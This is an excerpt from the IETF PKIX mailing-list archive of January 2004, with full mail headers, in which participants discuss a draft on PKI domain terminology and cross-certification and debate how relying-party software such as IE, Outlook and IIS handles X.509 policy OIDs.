PKI domainis misleading. The PKIX WG has been using the > concept of validation policyto describe the rules applicable to trust a > given certificate. However, this terminology is not used in this document. My understanding about "validation Policy" is same as what you mentioned. But "PKI domain" is not same as "validation policy". "PKI domain" is a grouping for identifying a PKI operated on same certificate policy. For example, a set of CAs certified by one CA unilaterally with the same certificate policy is grouped as one PKI domain. And such two PKI domains may interconnect via bridge CA. > The definition of subscriberis misleading and should not be confused with > subject I remove "subscriber" from terminology. > It is also misleading to say In a single-domain PKI (whatever this notion > may mean), these [i.e. trust anchors] may be omitted tacitly There always > exists at least one trust anchor, otherwise it is impossible to verify a > certificate. Certainly I was confusing... I remove this sentence. > The wordings unified domain modeland unificate CAare introduced but > are not explained. OOPS;( Sorry, I add the explanation for unified domain model and unificate CA to next revision. > The definition of PKI domain which seems to map to the concept of validation > policy is wrong: the MUST and SHOULD included in the definition are wrong. > The notion of domain policy is inadequate as well. Could you tell me the reason why you map "PKI domain" to "validation policy"? I feel necessity of removing your misunderstanding. > The notion of Mesh PKI is introduced in the definition section, but is not > explained. In fact, I was suffering from how to treat of Mesh PKI. I guessed that Mesh PKI was not designed intentionally, but formed passively by various reason. But some people gave an advice to me. When a PKI trusts other PKI directly, such some PKIs may form the Mesh PKI, and it gives a shorter certification path as merit. I am going to consider Mesh PKI more again. > The notion of principal CAis not needed. Why would you feel so? > The notion of PKI domainof the subscriber is unclear. Does it means that > the CA that has issued the end-entity certificate musty issue a self-signed > certificate ? No. In this draft, subscriber means a subject of target certificate. For example at Fig.9, when EE in PKI 3 is target certificate, "PKI domain of subscriber" is PKI 3. CA that requires self-signed certificate in PKI 3 is only PCA. > What is the difference between a trust anchor and a trust point ? Trust anchor is using in only single-trust point model, because "anchor" means unique point. I feel that the concepts of "trust anchor" and "trust point" are the same as RFC3125 you described. Is it different? Anyway, if this causes some confusion, the two should be integrated. > The notions of Public PKIand Private PKIare not appropriate. What can > be a trust point registered without clear agreement ??? Do you mention that considering these two at PKIX is not appropriate? or just description of public PKI and private PKI? Essentially, I am concerned about some users specifying only a trust anchor as validation policy. The Wording of "Public PKI and Private PKI" might be not appropriate exactly. But in actual world, most root certificates in MS cert store are used so. I called therefore such usage is public PKI. It is rare that the root certificate stored in MS certificate store is used with explicit policy. Most of the trust anchors used with explicit policy is the root certificate which a relying party added later intentionally. I called such is a private PKI. If you find better wordings, tell me please. > Trust relationship cant be restricted to Trust relationships between CAs. > There are first between CAs and relying parties. Sure. But, it is an extreme argument. I mentioned about xxx-constraints in cross-certificate. > There is no reason why CAs in a trust list SHOULD NOT cross-certify each other. Though each CAs cross-certify each other, I could not find the reason why a relying-party trusts each CAs. I think such complex trust relationship makes a confusion and prevent the multi-domain PKI interoperability. > The most important case for trust list has been omitted: it is when the > trust list is establish by an authority which trusts some CAs. Then relying > parties trusting that authority can use the trust lists established by that > authority for some specific purpose. It sounds good:-) Thanks. > In section 3.2 about Cross-Certification there should not be the following > requirements : > > " CA that issues a cross-certificate MUST have a self-signed certificate". > " CA issued the cross-certificate also MUST have a self-signed certificate" Oops, first one is not reuired. it is mistake. But second one MUST be required. I worry that a subordinate CA is cross-certified from some CA other than the superior CA. In that case, issuer CA MUST require an ARL issued by the superior CA, and MUST validate the certification path to the superior CA. Why does not issuer CA cross-certify the superior CA directly? Thanks for your patience. ----- Masaki SHIMAOKA SECOM Trust.net System Engineering Dpt. Tel: +81 422 91 8498 (ext.3605) Fax: +81 422 45 0536 e-mail: shimaoka@secom.ne.jp Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0S7WKqb000714; Tue, 27 Jan 2004 23:32:20 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0S7WKq4000713; Tue, 27 Jan 2004 23:32:20 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av1-1-sn1.fre.skanova.net (av1-1-sn1.fre.skanova.net [81.228.11.107]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0S7WIlU000705 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 23:32:19 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av1-1-sn1.fre.skanova.net (Postfix, from userid 502) id 4E54837E7C; Wed, 28 Jan 2004 08:32:13 +0100 (CET) Received: from smtp5.hy.skanova.net (smtp5.hy.skanova.net [195.67.199.134]) by av1-1-sn1.fre.skanova.net (Postfix) with ESMTP id 3095F37E7C; Wed, 28 Jan 2004 08:32:13 +0100 (CET) Received: from arport (t11o913p1.telia.com [213.64.28.1]) by smtp5.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0S7WA7N028262; Wed, 28 Jan 2004 08:32:11 +0100 (CET) Message-ID: <006f01c3e570$14a48510$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: <ietf-pkix@imc.org>, "James Jing" <jjing@betrusted.com> Cc: "Peter Gutmann" <pgut001@cs.auckland.ac.nz> References: <85DA9C6C3DD8C74F8A8611815C635F8D415280@AMALTHEA.securenet.com.au> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 08:10:32 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> James, Now you are talking! In case nobody, in spite of Peter Gutmann's generous reward, takes on the challenge describing how X.509 policies should be handled by relying parties [1] based on RFC3280 "as is", I believe that the X.509 policy system should be given a deep second thought. Best Anders 1] Comprising of software, administrators, end-users, and lawyers. ----- Original Message ----- From: "James Jing" <jjing@betrusted.com> To: <ietf-pkix@imc.org> Cc: "Anders Rundgren" <anders.rundgren@telia.com> Sent: Wednesday, January 28, 2004 03:58 Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Maybe there are enough people out there who also think that PKI has grown out of control, too hard for simple users to comprehend, even too hard for knowledgeable implementers? How can we return to simple and effective PKI? -----Original Message----- From: Anders Rundgren [mailto:anders.rundgren@telia.com] Sent: Tuesday, January 27, 2004 9:45 PM To: ietf-pkix@imc.org Subject: Setting X.509 Policy Data in IE, IIS, Outlook It has been touted that policy OIDs are essntial for building PKIs. However, I have not found any place where you can can set the policy filtering in relying party apps like MSIE, IIS, or Outlook. I would be interested to know when this feature will be available and how the policy-OID-related processes are supposed to work from an end-user perspective. In case there are such application features available from other vendors, I would be interested in how they have addresses this issue. In particular, what you do after "installing" a trust anhcor does not seem to be an not entirely straightforward matter unless you do a lot of assumptions. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0S0TWi4070889; Tue, 27 Jan 2004 16:29:32 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0S0TWcU070888; Tue, 27 Jan 2004 16:29:32 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp.cs.auckland.ac.nz (smtp.cs.auckland.ac.nz [130.216.33.151]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0S0TSx9070880 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 16:29:31 -0800 (PST) (envelope-from pgut001@cs.auckland.ac.nz) Received: from cs.auckland.ac.nz (medusa01.cs.auckland.ac.nz [130.216.34.33]) by smtp.cs.auckland.ac.nz (Postfix) with ESMTP id EB23C34050; Wed, 28 Jan 2004 13:28:40 +1300 (NZDT) Received: (from pgut001@localhost) by cs.auckland.ac.nz (8.11.6/8.11.6) id i0S0TOx20370; Wed, 28 Jan 2004 13:29:24 +1300 Date: Wed, 28 Jan 2004 13:29:24 +1300 Message-Id: <200401280029.i0S0TOx20370@cs.auckland.ac.nz> From: pgut001@cs.auckland.ac.nz (Peter Gutmann) To: anders.rundgren@telia.com, kent@bbn.com Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: ietf-pkix@imc.org Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Stephen Kent <kent@bbn.com> writes: >>Borrowing from your IPsec complaints: >>A "compliant management interface for the security policy database" >>for X.509 would be fun to review. As far as I can see, the X.509 >>policy mechanisms are flawed to the point where it becomes technically >>infeasible to specify such an interface. But I stay interested if anybody >>dares to challenge that statement with something tangible instead of >>the usual PKI mumbo-jumbo, like "there are many ways to do this". > >A challenge with no apparent reward to motivate a response, as usual ... I hereby offer a reward of one (1) bilabial fricative to anyone who can provide a clear technical explanation/description of a policy management interface for X.509, to be paid in full upon delivery of said explanation/description. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RLEU0P059324; Tue, 27 Jan 2004 13:14:30 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RLEUrf059323; Tue, 27 Jan 2004 13:14:30 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from nwkea-mail-2.sun.com (nwkea-mail-2.sun.com [192.18.42.14]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RLESDq059305 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 13:14:28 -0800 (PST) (envelope-from Steve.Hanna@Sun.COM) Received: from phys-bur1-1 ([129.148.13.15]) by nwkea-mail-2.sun.com (8.12.10/8.12.9) with ESMTP id i0RLEP0H025550 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 13:14:25 -0800 (PST) Received: from sun.com (dhcp-ubur02-75-161.East.Sun.COM [129.148.75.161]) by bur-mail2.east.sun.com (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTPA id <0HS600EXI2ZZ7Z@bur-mail2.east.sun.com> for ietf-pkix@imc.org; Tue, 27 Jan 2004 16:14:25 -0500 (EST) Date: Tue, 27 Jan 2004 16:13:27 -0500 From: Steve Hanna <Steve.Hanna@Sun.COM> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook To: David Cross <dcross@microsoft.com> Cc: Anders Rundgren <anders.rundgren@telia.com>, ietf-pkix@imc.org Message-id: <4016D477.7F86CC0F@sun.com> MIME-version: 1.0 X-Mailer: Mozilla 4.79 [en] (WinNT; U) Content-type: multipart/signed; boundary=------------ms322D00FA85FF29931F6490BB; micalg=sha1; protocol="application/x-pkcs7-signature" X-Accept-Language: en References: <3C69AE30038D9A4590F5EC20DCD41F68015F134B@RED-MSG-41.redmond.corp.microsoft.com> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a cryptographically signed message in MIME format. --------------ms322D00FA85FF29931F6490BB Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit The Java 2 Platform supports setting policy parameters with the java.security.cert.PKIXParameters class. For more details, see http://java.sun.com/j2se/1.4.2/docs/api/java/security/cert/PKIXParameters.html http://java.sun.com/j2se/1.4.2/docs/guide/security/certpath/CertPathProgGuide.html#PKIXParameters -Steve David Cross wrote: > > Anders et al: > > Microsoft supports the capability to set a policy option during the > chain building process through the CertGetCertificateChain() API as a > parameter in the CHAIN PARA structure. Reference: > http://msdn.microsoft.com/library/default.asp?url=/library/en-us/securit > y/security/certgetcertificatechain.asp > > At this time, Internet Explorer, Outlook, IIS etc. do not support > configuration of this policy parameter...frankly due to the fact that > there is no end user demand for such a feature. Arguably the demand > does not exist as nobody in my family could possibly understand what a > policy OID is and what it means to them. > > However, Windows Server 2003 IAS Server component (RADIUS/Remote Access > Server) does support admin configuration of allowed policy OIDs by the > administrator on the server. In this particular case, it is an > interesting case with quite some utility as it allows an organization to > very discretely define which authentication certs would be allowed for > VPN, etc. For example, certificates issued to smartcards incorporates > policy OID foo while authentication certs to software based key stores > incorporates policy OID bar, the remote access server may require that > only smartcard based certs may be used for access. > > David B. Cross > > -----Original Message----- > From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] > On Behalf Of Anders Rundgren > Sent: Tuesday, January 27, 2004 2:45 AM > To: ietf-pkix@imc.org > Subject: Setting X.509 Policy Data in IE, IIS, Outlook > > It has been touted that policy OIDs are essntial for building PKIs. > > However, I have not found any place where you can can set the policy > filtering in relying party apps like MSIE, IIS, or Outlook. > > I would be interested to know when this feature will be available and > how the policy-OID-related processes are supposed to work from an > end-user perspective. > > In case there are such application features available from other > vendors, I would be interested in how they have addresses this issue. > > In particular, what you do after "installing" a trust anhcor does not > seem to be an not entirely straightforward matter unless you do a lot of > assumptions. > > Anders --------------ms322D00FA85FF29931F6490BB Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIIEAYJKoZIhvcNAQcCoIIIATCCB/0CAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC BeMwggKjMIICDKADAgECAgMKVAgwDQYJKoZIhvcNAQEEBQAwgZIxCzAJBgNVBAYTAlpBMRUw EwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhh d3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwg RnJlZW1haWwgUlNBIDIwMDAuOC4zMDAeFw0wMzA3MTExMTAxNTFaFw0wNDA3MTAxMTAxNTFa MGgxDjAMBgNVBAQTBUhhbm5hMRUwEwYDVQQqEwxTdGVwaGVuIFJvc3MxGzAZBgNVBAMTElN0 ZXBoZW4gUm9zcyBIYW5uYTEiMCAGCSqGSIb3DQEJARYTc3RldmUuaGFubmFAc3VuLmNvbTCB nzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAoxRk/abMPe7Km2EqpD2FZXzjiBGUHhIdNlIO 9W6mdCQro1xMc+sv+93UuVnIzse+XA67Tqx4g5FdoQ+PI8TQYemYSkTD9GitgU563ypu03UV 86zTJA7u9zVkNv/qL2LRKZ9BXy2Smtet+PUh3nYjMh/ZY7LQxQzmdu1Zunue+yECAwEAAaMw MC4wHgYDVR0RBBcwFYETc3RldmUuaGFubmFAc3VuLmNvbTAMBgNVHRMBAf8EAjAAMA0GCSqG SIb3DQEBBAUAA4GBAHbpX0TKiOFu1vxKc3nAOcUHwoci5kinboYrnjWcl37mMXXbBFntaYRM 9LxpGtHdPm7F4pAviKp8bnFzTU46OyUw3kNUAVGDeWYVQC76f0dDZdA313Tn88UZYa+N6O8W bO8wjKA2vg+yx79WXJCFDu+TpsG/28NKPdH42w8LEOVHMIIDODCCAqGgAwIBAgIQZkVyt8x0 9c9jdkWE0C6RATANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3Vs dGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UE AxMbVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25h bC1mcmVlbWFpbEB0aGF3dGUuY29tMB4XDTAwMDgzMDAwMDAwMFoXDTA0MDgyNzIzNTk1OVow gZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUg VG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEo MCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMDCBnzANBgkqhkiG9w0B AQEFAAOBjQAwgYkCgYEA3jMypmPHCSVFPtJueCdngcXaiBmClw7jRCmKYzUqbXA8+tyu9+50 bzC8M5B/+TRxoKNtmPHDT6Jl2w36S/HW3WGl+YXNVZo1Gp2Sdagnrthy+boC9tewkd4c6avg GAOofENCUFGHgzzwObSbVIoTh/+zm51JZgAtCYnslGvpoWkCAwEAAaNOMEwwKQYDVR0RBCIw IKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDEtMjk3MBIGA1UdEwEB/wQIMAYBAf8CAQAw CwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBBAUAA4GBADGxS0dd+QFx5fVTbF151j2YwCYTYoEi pxL4IpXoG0m3J3sEObr85vIk65H6vewNKjj3UFWobPcNrUwbvAP0teuiR59sogxYjTFCCRFs sBpp0SsSskBdavl50OouJd2K5PzbDR+dAvNa28o89kTqJmmHf0iezqWf54TYyWJirQXGMYIB 9TCCAfECAQEwgZowgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQ BgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0 ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMAID ClQIMAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B CQUxDxcNMDQwMTI3MjExMzI3WjAjBgkqhkiG9w0BCQQxFgQUJVSrX6JONMQgu+00AEfOho5l LoQwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwBwYFKw4D AgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEgYBPGOqb +FdyvGnVIcxIp45Y3vrxJbZZn9wujUYWJbKc1OFJzCzhjLO5rt/BYVqVuu6k5QYTzKtLu1Kk ABhtx7GQpt+b/sJK+9SZgYlBuGtGQh2E5rM16qhy36n3BgkdyIOjVq+gr1fWoyqW31gQ5tEk JDGozbsPURYc1WPMUgZvvA== --------------ms322D00FA85FF29931F6490BB-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RLBfd1059228; Tue, 27 Jan 2004 13:11:41 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RLBf8i059227; Tue, 27 Jan 2004 13:11:41 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mdhagsmtp01.firstdata.com (mdhagsmtp01.firstdata.com [198.184.5.21]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RLBdRS059212 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 13:11:40 -0800 (PST) (envelope-from lynn.wheeler@firstdata.com) Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook To: "Anders Rundgren" <anders.rundgren@telia.com> Cc: ietf-pkix@imc.org, "Stephen Kent" <kent@bbn.com>, owner-ietf-pkix@mail.imc.org X-Mailer: Lotus Notes Release 5.0.5 September 22, 2000 Message-ID: <OFDC6E9D11.3BEA6E7F-ON87256E28.00719EB9@firstdata.com> From: lynn.wheeler@firstdata.com Date: Tue, 27 Jan 2004 14:09:28 -0700 X-MIMETrack: Serialize by Router on MDHAGSMTP/FDMS/FDC(Release 6.0.2CF2|July 23, 2003) at 01/27/2004 04:11:03 PM MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Another issue is that many of the traditional business trust models have tended to be some sort of contract (exchange of value) between two parties; supposedly the CA trust propogation relationship typically is between the relying party and the CA ... while the contractual relationship is between the public key owner and the CA (except for situations like relying-party-only certificates .... where the same party is both selling/issuing the certificates and also relying on the certificates) .... aka the trust propogation relationship and the contractual trust relationship are unrelated. another solution has been to try and have some sort of governmental legislative proclamation ... declaring/mandating a trust relationship ... even if one doesn't exist from a business and/or contractual standpoint. the gsa federal government PKI .... seems to be a variation on the relying-party-only certificate .... the CAs appear to have a GSA contract where they effectively are agents of the federal government (i.e. the CAs are federal agents issuing/selling certificates on behalf of the federal government). These certificates are then for use by the federal government as the relying party (making them relying-party certificates). now, the next issue is that the majority of the federal PKI programs appear to be online operation ... which in turn would supposedly allow the relying-party federal government ... to have online access to the original of the information where the relying-party-only certificate represents a stale, static copy of some such information stored in some databsse. Also, possibly because of privacy issues, the stale, static (certificate) copy is likely also a subset of the information that is actually stored in some database (collected at the time the registration authority function was performed involving the registration of the public key and information about the owner of the public key). One possible issue is that the operations being performed in conjunction with the federal PKI program certificates are of such low value, that it doesn't justify having online, timely access to the real information (even when it appears that all of the applications in the program are otherwise online) ... aka long-time assertion that relying-party, state, static, subset certificate information tends to be redundant and superfluous given that there can be online access to the original, timely information. on 1/27/2004 12:27 pm anders.rundgren.com wrote: May I help you with some analysis? PKI projects historically started with the CA, and this has influenced some PKI standards as well, the RFC3280 policy support is a prime example of that. However, being a CA, is being an "information producer" which is considerably easier than being an "information consumer" as only the latter has to "interpret" and maybe "act" upon what the information producer says. If the designers of the policy system instead had focused on the relying party (the "information consumer"), they had probably realized that a relying party consists of 1) the relying party software 2) the people depending on the relying party software. Further analysis shows that the "people" category, except in the most trivial scenarios, consists of "trust administrators" and "end users". In the background there are also some legal folks lurking around. If you then apply the design constraint that all these entities should have the best possible system adapted for the entities' actual tasks and competence, you would end-up with a very different policy scheme. Commercial CAs know that, and therefore with few exceptions, continue to ignore a system that was not designed with the "customer in mind". The major difference is that policy in commercial CAs is associated with the CA, eliminating the need for moving trust processing and trust administration tasks into the application and user domains respectively. This enables the creation of shrink-wrap RP software as well as shielding end-users from too close encounters with PKI. This also allows trust admins to anytime, using "CA properties", view what "they actually currently trust", without having a single EE certificate! Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RL5Vid058885; Tue, 27 Jan 2004 13:05:31 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RL5Vw4058884; Tue, 27 Jan 2004 13:05:31 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av1-2-sn1.fre.skanova.net (av1-2-sn1.fre.skanova.net [81.228.11.108]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RL5SuW058874 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 13:05:30 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av1-2-sn1.fre.skanova.net (Postfix, from userid 502) id F37D537E45; Tue, 27 Jan 2004 22:05:24 +0100 (CET) Received: from smtp5.hy.skanova.net (smtp5.hy.skanova.net [195.67.199.134]) by av1-2-sn1.fre.skanova.net (Postfix) with ESMTP id DC7CE37E45; Tue, 27 Jan 2004 22:05:24 +0100 (CET) Received: from arport (t12o913p55.telia.com [213.64.28.175]) by smtp5.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0RL5N7N005970; Tue, 27 Jan 2004 22:05:23 +0100 (CET) Message-ID: <002601c3e518$848b66d0$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "David Cross" <dcross@microsoft.com>, <ietf-pkix@imc.org> References: <3C69AE30038D9A4590F5EC20DCD41F68015F134B@RED-MSG-41.redmond.corp.microsoft.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Tue, 27 Jan 2004 21:59:55 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 x-mimeole: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Thanx David, My request should in no way be interpreted as a criticism of the lack of policy settings in IE, Outlook and IIS, because as you say there is no user demand for such a feature which in turn is due to the limited utility of policy identifiers. Assuming that you added such support to the Windows trust anchor installation process, I believe you would run into a little problem: How is the trust administrator supposed to know what policy OIDs the CA uses? Therefore the policy system is really only usable in local PKIs like in the W2K3 VPN scenario you described. However, a TPP CA would most likely use different logical CAs for smart card based keys and file based keys to not get sued by customers that did not understand that they actually trusted (and therefore accepted) a bit more stuff than they really opted for (or their software was designed to handle)... Anders Rundgren ----- Original Message ----- From: "David Cross" <dcross@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>; <ietf-pkix@imc.org> Sent: Tuesday, January 27, 2004 20:47 Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Anders et al: Microsoft supports the capability to set a policy option during the chain building process through the CertGetCertificateChain() API as a parameter in the CHAIN PARA structure. Reference: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/securit y/security/certgetcertificatechain.asp At this time, Internet Explorer, Outlook, IIS etc. do not support configuration of this policy parameter...frankly due to the fact that there is no end user demand for such a feature. Arguably the demand does not exist as nobody in my family could possibly understand what a policy OID is and what it means to them. However, Windows Server 2003 IAS Server component (RADIUS/Remote Access Server) does support admin configuration of allowed policy OIDs by the administrator on the server. In this particular case, it is an interesting case with quite some utility as it allows an organization to very discretely define which authentication certs would be allowed for VPN, etc. For example, certificates issued to smartcards incorporates policy OID foo while authentication certs to software based key stores incorporates policy OID bar, the remote access server may require that only smartcard based certs may be used for access. David B. Cross -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Anders Rundgren Sent: Tuesday, January 27, 2004 2:45 AM To: ietf-pkix@imc.org Subject: Setting X.509 Policy Data in IE, IIS, Outlook It has been touted that policy OIDs are essntial for building PKIs. However, I have not found any place where you can can set the policy filtering in relying party apps like MSIE, IIS, or Outlook. I would be interested to know when this feature will be available and how the policy-OID-related processes are supposed to work from an end-user perspective. In case there are such application features available from other vendors, I would be interested in how they have addresses this issue. In particular, what you do after "installing" a trust anhcor does not seem to be an not entirely straightforward matter unless you do a lot of assumptions. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RJm7rG052705; Tue, 27 Jan 2004 11:48:07 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RJm7vN052704; Tue, 27 Jan 2004 11:48:07 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail2.microsoft.com (mail2.microsoft.com [131.107.3.124]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RJm73b052694 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 11:48:07 -0800 (PST) (envelope-from dcross@microsoft.com) Received: from INET-VRS-02.redmond.corp.microsoft.com ([157.54.8.110]) by mail2.microsoft.com with Microsoft SMTPSVC(6.0.3790.1041); Tue, 27 Jan 2004 11:48:04 -0800 Received: from 157.54.8.155 by INET-VRS-02.redmond.corp.microsoft.com (InterScan E-Mail VirusWall NT); Tue, 27 Jan 2004 11:47:59 -0800 Received: from RED-MSG-41.redmond.corp.microsoft.com ([157.54.12.201]) by inet-hub-04.redmond.corp.microsoft.com with Microsoft SMTPSVC(6.0.3790.0); Tue, 27 Jan 2004 11:48:14 -0800 x-mimeole: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Date: Tue, 27 Jan 2004 11:47:52 -0800 Message-ID: <3C69AE30038D9A4590F5EC20DCD41F68015F134B@RED-MSG-41.redmond.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Setting X.509 Policy Data in IE, IIS, Outlook Thread-Index: AcPk3TQsXd1245sEQk6ORS4TkEfkkQAL9yDA From: "David Cross" <dcross@microsoft.com> To: "Anders Rundgren" <anders.rundgren@telia.com>, <ietf-pkix@imc.org> X-OriginalArrivalTime: 27 Jan 2004 19:48:14.0074 (UTC) FILETIME=[8043DDA0:01C3E50E] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0RJm73b052699 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders et al: Microsoft supports the capability to set 